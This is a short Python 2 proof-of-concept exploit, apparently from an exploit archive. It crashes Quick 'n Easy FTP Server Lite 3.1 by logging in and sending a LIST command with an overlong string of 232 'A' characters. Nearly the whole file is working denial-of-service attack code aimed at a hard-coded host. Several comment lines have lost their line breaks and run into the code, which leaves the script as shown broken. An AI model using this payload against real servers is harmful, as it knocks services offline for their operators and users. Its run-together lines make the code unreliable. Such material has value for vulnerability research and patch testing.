#!/usr/bin/python
print "\n############################################################"
print "## Team Hackers Garage ##"
print "## Quick 'n Easy FTP Server Lite Version 3.1 ##"
print "## Crash PoC ##"
print "## Sumit Sharma (aka b0nd) ##"
print "## sumit.iips@gmail.com ##"
print "## ##"
print "## Special Thanks to: Double_Zero ##"
print "## (http://www.exploit-db.com/author/DouBle_Zer0)##"
print "## & ##"
print "## corelanc0d3r (CORELAN TEAM) ##"
print "## ##"
print "############################################################"# Summary: The "LIST" command in Version 3.1 of Quick 'n Easy FTP Server Lite is vulnerable # Tested on: Windows XP SP2# ftp> ls AAAA... 232 A's...AAA?# Server Crash!# Only EBX gets overwritten at the time of crash with the string following first 232 A's (in case using longer string).# No SEH overwrite# No EIP overwritefrom socket import *
host = "172.12.128.4"# Virtual Windows XP SP2
port = 21
user = "test"# "upload" and "download" access
password = "test"
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)
s.send("user %s\r\n"%(user))
print s.recv(1024)
s.send("pass %s\r\n"%(password))
print s.recv(1024)
buffer = "LIST "
buffer +="A"* 232
buffer +="?"
buffer +="\r\n"
s.send(buffer)
print s.recv(1024)
s.close()
print "---->>> Server Crash!!!"
